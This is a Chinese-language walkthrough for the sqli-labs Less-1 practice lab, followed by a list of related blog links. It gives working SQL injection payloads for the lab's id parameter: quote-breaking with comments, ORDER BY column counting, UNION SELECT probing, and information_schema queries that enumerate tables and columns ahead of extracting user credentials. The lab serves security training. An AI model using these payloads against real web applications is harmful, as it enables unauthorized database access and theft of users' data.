sqli-labs Basic Challenge Less_1 通关指南

sqli-labs Basic Challenge Less_1 通关指南

测试注入点

在进行SQL注入之前,首先要找到可能出现的注入点,以及其防护等级,也就是查找是否有漏洞。

进入网页之后显示这样的页面,提示为:

Please input the ID as parameter with numeric value

在网址后输入?id=1,显示出这个界面:

接下来我们开始详细分析这个注入点

测试注入点的数据类型

对于字符型、数字型和查找型的注入代码有所不同,所以要先判断注入点的类型。

对于这三种数据类型,书写代码时有所不同,如:

  1. 对于数字型:
php 复制代码
select * from xxx where id =$id;

这种类型最为简单,直接注入不会有其他的影响。

  1. 对于字符型:
php 复制代码
select * from xxx where id ='$id';

或者:

php 复制代码
select * from xxx where id ="$id";

在进行注入的时候如果不进行任何其他操作,整个命令都会被当成一个字符型数据类型,导致注入的代码无法执行

  1. 对于查找型:
php 复制代码
select * from xxx where id like %$id%;

查找型与字符型基本同理。

测试过程:

首先测试为数字型的可能性,我们输入:

php 复制代码
/?id=1 and 1=1

以及

php 复制代码
/?id=1 and 1=2

测试有无异常,发现没有异常。

然后我们测试为字符型的可能性:

php 复制代码
/?id=1' and 1=2

发生报错:

报错信息为:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and1=2' LIMIT 0,1' at line 1

报错信息大致意思时and1=2' LIMIT 0,1这附近的语句出现问题,确实,由于原语句中在'$id'之后有一段 LIMIT 0,1导致报错。

解决方案是:

php 复制代码
/?id=1' and 1=2 --+

--+注释后面的代码即可,最后页面显示为:

出现异常。

测试返回点:

在SQL语句执行之后,服务器的数据会在Web中显示,我们需要确定哪一个点的数据被显示在特定位置上。

测试列数:

输入代码:

php 复制代码
/?id=-1' and 1=1 order by n --+

n为常数,如果n超过列数即会报错。

报错信息为:

Unknown column '4' in 'order clause'

测试返回点:

输入代码:

php 复制代码
/?id=-1' union select 1,2,3 --+

这样我们可以把代码中的2和3替换成其他命令,这样可以在Web中显示。

收集数据:

版本

可以通过version()函数获取,示例代码如下:

bash 复制代码
select version() 

用户权限

可以通过user()函数获取:

bash 复制代码
select user() 

库名

可以通过database()函数获取

bash 复制代码
select database() 

表名与列名

这里我们就要知道一些系统表的知识了:

详细请查看MySQL系统库之information_schema,这个表中记录了库名、表名、列名等有效信息。

bash 复制代码
select * from information_schema.tables where TABLE_SCHEMA='database()'

具体解释为:查找改数据库中所有表的信息。

bash 复制代码
select * from information_schema.column where TABLE_NAME='XXX'

具体解释为查找某个表中所有列名。

查找敏感信息

在获取了以上信息后,就可以查询一些敏感信息了,包括用户的用户名和密码等。

相关推荐
DevSecOps选型指南6 小时前
2025软件供应链安全最佳实践︱证券DevSecOps下供应链与开源治理实践
网络·安全·web安全·开源·代码审计·软件供应链安全
ABB自动化6 小时前
for AC500 PLCs 3ADR025003M9903的安全说明
服务器·安全·机器人
coding随想6 小时前
JavaScript ES6 解构:优雅提取数据的艺术
前端·javascript·es6
小小小小宇6 小时前
一个小小的柯里化函数
前端
恰薯条的屑海鸥6 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十六期-SSRF模块)
数据库·学习·安全·web安全·渗透测试·网络安全学习
灵感__idea6 小时前
JavaScript高级程序设计(第5版):无处不在的集合
前端·javascript·程序员
小小小小宇6 小时前
前端双Token机制无感刷新
前端
小小小小宇6 小时前
重提React闭包陷阱
前端
曼汐 .6 小时前
数据库管理与高可用-MySQL高可用
数据库·mysql
MickeyCV7 小时前
使用Docker部署MySQL&Redis容器与常见命令
redis·mysql·docker·容器·wsl·镜像